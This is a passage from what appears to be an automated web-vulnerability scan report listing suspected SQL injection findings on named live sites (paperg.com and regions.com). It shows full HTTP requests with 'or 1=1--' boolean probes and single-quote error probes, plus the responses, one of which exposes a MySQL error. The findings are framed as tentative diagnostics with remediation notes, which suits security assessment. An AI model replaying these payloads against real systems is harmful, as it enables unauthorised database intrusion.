Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.25. http://www.paperg.com/flyerboard/seton-health/1552/45970.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/seton-health/1552/45970.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 67668881%20or%201%3d1--%20 and 67668881%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/seton-health/155267668881%20or%201%3d1--%20/45970.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3873
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Seton Health - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Seton Health" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/7346/5seton130513288645970.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       <
...[SNIP]...

Request 2

GET /flyerboard/seton-health/155267668881%20or%201%3d2--%20/45970.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.26. http://www.paperg.com/flyerboard/seton-health/1753/45970.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/seton-health/1753/45970.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16695011%20or%201%3d1--%20 and 16695011%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/seton-health/175316695011%20or%201%3d1--%20/45970.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3873
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Seton Health - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Seton Health" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/7346/5seton130513288645970.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       <
...[SNIP]...

Request 2

GET /flyerboard/seton-health/175316695011%20or%201%3d2--%20/45970.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.27. http://www.paperg.com/flyerboard/your-business-or-event-could-be-here/1552/222.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/your-business-or-event-could-be-here/1552/222.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 15969208%20or%201%3d1--%20 and 15969208%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/your-business-or-event-could-be-here/155215969208%20or%201%3d1--%20/222.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4596
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Your Business or Event Could Be Here - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Your Business or Event Could Be Here" />
   
   <meta name="description" content = "Looking to publicize your business or event? Post a flyer on the Flyerboard to reach hundreds of thousands of local residents. Upload any image and the Flyer..." />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/166/40flyerboard_your_flyer_here.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END :
...[SNIP]...

Request 2

GET /flyerboard/your-business-or-event-could-be-here/155215969208%20or%201%3d2--%20/222.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.28. http://www.paperg.com/jsfb/embed.php [bid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The bid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the bid parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /jsfb/embed.php?view=all&pid=891&cid=0&bid=1552' HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:49:44 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 47808


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1552''' at line 1
   var view_all_board = document.getElementById("view_all_board");
   if(view_all_bo
...[SNIP]...

Request 2

GET /jsfb/embed.php?view=all&pid=891&cid=0&bid=1552'' HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:49:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 47689


   var view_all_board = document.getElementById("view_all_board");
   if(view_all_board)
       view_all_board.style.height = "450px";
   var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_roo
...[SNIP]...

1.29. http://www.regions.com/about_regions/company_info.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /about_regions/company_info.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /about_regions'/company_info.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/wrapperHeader.aspx?p=477
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557549322:ss=1305556924172

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/about_regions'/company_info.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 188

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fabout_regions'%2fcompany_info.rf">here</a>.</h2>
</body></html>

Request 2

GET /about_regions''/company_info.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/wrapperHeader.aspx?p=477
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557549322:ss=1305556924172

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.30. http://www.regions.com/about_regions/email_fraud.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /about_regions/email_fraud.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /about_regions'/email_fraud.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/protecting_self_online.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557307425:ss=1305556924172

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:49:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/about_regions'/email_fraud.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 187

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fabout_regions'%2femail_fraud.rf">here</a>.</h2>
</body></html>

Request 2

GET /about_regions''/email_fraud.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/protecting_self_online.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557307425:ss=1305556924172

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:49:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.31. http://www.regions.com/about_regions/privacy_security.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /about_regions/privacy_security.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /about_regions'/privacy_security.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305556924172:ss=1305556924172

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:43:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/about_regions'/privacy_security.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 192

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fabout_regions'%2fprivacy_security.rf">here</a>.</h2>
</body></html>

Request 2

GET /about_regions''/privacy_security.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305556924172:ss=1305556924172

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:43:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.32. http://www.regions.com/about_regions/protecting_self_online.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /about_regions/protecting_self_online.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /about_regions'/protecting_self_online.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/report_fraud.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557020647:ss=1305556924172

Response 1 (redirected)

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Date: Mon, 16 May 2011 15:48:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/siteerror.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 154

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/siteerror.aspx">here</a>.</h2>
</body></html>

Request 2

GET /about_regions''/protecting_self_online.rf HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/report_fraud.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557020647:ss=1305556924172

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:48:34 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 17340


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

1.33. http://www.regions.com/about_regions/report_fraud.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /about_regions/report_fraud.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /about_regions'/report_fraud.rf HTTP/1.1
Host: www.regions.com
